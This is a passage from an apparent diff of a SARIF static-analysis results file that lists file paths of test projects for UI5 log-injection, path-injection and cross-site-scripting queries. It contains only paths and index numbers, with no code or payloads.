"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + 
"index" : 204 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 224 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : 
"%SRCROOT%", + "index" : 235 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 257 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + 
}, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" 
: 301 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } 
+ }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + }, { + "location" : { + "uri" : 